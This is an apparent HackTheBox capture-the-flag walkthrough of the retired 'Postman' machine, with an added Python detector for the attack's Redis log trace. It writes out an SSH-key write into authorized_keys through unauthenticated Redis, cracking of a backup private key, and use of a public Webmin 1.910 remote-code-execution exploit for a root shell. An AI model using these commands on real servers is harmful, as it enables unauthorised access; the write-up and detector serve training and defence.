Postman – HTB Walkthrough


Postman is an “easy” rated and retired machine from HackTheBox, meaning you will need a VIP subscription to interact with this machine. Although rated as easy, it is still a great box to get some experience with services and tools we don’t use often.
We start with nmap, including the “-p-” switch to scan all ports.
sudo nmap -sV -sC -p- postman


We have SSH, Apache webserver, Redis and port 1000 running an HTTP server with an app called Webmin.
I always like to visit the web server first and get GoBuster working. SSH is rarely the initial vector in CTFs, but it is something to always come back to if and when you get some credentials.
After a poke around on the website there doesn’t seem to be too much going on.


Start GoBuster on port 80;
gobuster dir -u http://postman -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt


As we let that run, let’s check out Redis. I grab the latest set of tools so we can interact with the Redis server. This includes the command line interface, which will allow us to log in and interact with the Redis server.
sudo apt-get install redis-tools


It seems like we can connect to the Redis server without authentication.


Now that we are on the box, we need to escalate privileges. After a bit of research I come across this article.
The general gist of the priv esc is to upload our own SSH key to the server, through Redis, by changing the Redis backup location. We can then SSH into the box.
First things first, we need to create our SSH key pair. After that, we take the contents of the public key and echo that into a text file, padding it with two line breaks. I named my SSH key “pair” and the text file pair.txt.
(echo -e "\n\n"; cat pair.pub; echo -e "\n\n") > pair.txt


Now we take the output of cat’ing the text file, and use that as input in our command to upload it to the Redis server.
cat pair.txt | redis-cli -h 10.10.10.160 -x set pwned
We then head onto our redis server. We can confirm our key has been successfully uploaded by using the command;
get pwned


Next we need to find out the installation location of Redis. We can do this with;
config get dir
Our location is /var/lib/redis.
We now set the backup location to the .ssh folder.
config set dir /var/lib/redis/.ssh
We then backup the data from our txt file, which is sitting in memory, into the backup location, which we have set as the SSH folder.
config set dbfilename authorized_keys


Log in and we are now on the box.
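
Seen from the defender's side, the Redis steps above leave a recognisable trace in the command stream. The following is an added example, not part of the original walkthrough: it parses Redis MONITOR-style lines and flags any client that stores an SSH public key, points dir at a .ssh folder, or sets dbfilename to authorized_keys. The sample lines and the client address 192.0.2.10 are constructed.

```python
import re

# Redis MONITOR line: <unix-ts> [<db> <client ip:port>] "cmd" "arg" ...
LINE = re.compile(r'^(\d+\.\d+) \[(\d+) ([^\]]+)\] (.*)$')
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')        # one double-quoted argument
SSH_DIR = re.compile(r'/\.ssh/?$')               # dir ending in .ssh
KEY_MARKER = re.compile(r'ssh-(rsa|ed25519|dss)|ecdsa-sha2-')

def detect(lines):
    """Return {client: sorted findings} for the key-write pattern."""
    findings = {}
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue                             # not MONITOR output
        client, args = m.group(3), ARG.findall(m.group(4))
        if not args:
            continue
        cmd = [a.lower() for a in args[:3]]
        hit = None
        if cmd[:2] == ["config", "set"] and len(args) >= 4:
            if cmd[2] == "dir" and SSH_DIR.search(args[3]):
                hit = "dir->" + args[3]
            elif cmd[2] == "dbfilename" and args[3] == "authorized_keys":
                hit = "dbfilename->" + args[3]
        elif cmd[0] == "set" and len(args) >= 3 and KEY_MARKER.search(args[2]):
            hit = "ssh-key-in-value:" + args[1]
        if hit:
            findings.setdefault(client, set()).add(hit)
    return {c: sorted(h) for c, h in findings.items()}

# Constructed sample input (not captured from a real server).
SAMPLE = [
    '1700000000.100000 [0 192.0.2.10:40112] "set" "pwned" "\\n\\nssh-rsa AAAA-constructed user@host\\n\\n"',
    '1700000000.200000 [0 192.0.2.10:40112] "get" "pwned"',
    '1700000001.300000 [0 192.0.2.10:40112] "config" "get" "dir"',
    '1700000002.400000 [0 192.0.2.10:40112] "config" "set" "dir" "/var/lib/redis/.ssh"',
    '1700000003.500000 [0 192.0.2.10:40112] "config" "set" "dbfilename" "authorized_keys"',
    '1700000004.600000 [0 127.0.0.1:51000] "set" "session:42" "ok"',
]

if __name__ == "__main__":
    for client, hits in detect(SAMPLE).items():
        print(client, hits)
```

A client that produces all three findings in one session is a strong signal; any single finding on a Redis instance reachable without authentication is worth investigating.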
Now that we are on the server, drag across linpeas and run;


We find a file called id_rsa.bak;


Make a copy of that file as we want to crack it.
We need to convert it to a format that John can use, using the tool ssh2john;


We start cracking using the Rockyou wordlist and get a password straight away, recovering the password “computer2008”;


I try to switch to the root user, however I get an authentication failure.
What users might be on the box?
cat /etc/passwd | grep /bin/bash


So we switch user to Matt. We should be able to get a flag now.


Recall our Webmin instance? Let’s try to log into that with Matt’s credentials.


There are lots of exploits available for this vulnerable version of Webmin, which is 1.910 according to nmap. Most are for Metasploit, which I am trying to avoid.


I came across this one, written in Python 3;
https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/blob/master/exploit_poc.py
I set up a listener


And run the exploit


And we get back our shell, run “id”;


We are root, now we just need to get the flag. The shell is very basic so we need to get the flag in a single command. First find out where we are.


ls the root directory


And then cat the txt file.


Metasploit
For fun let’s try the box with Metasploit.
Boot it up and search for an exploit.


Let’s use 3 and set the options




And that’s Postman.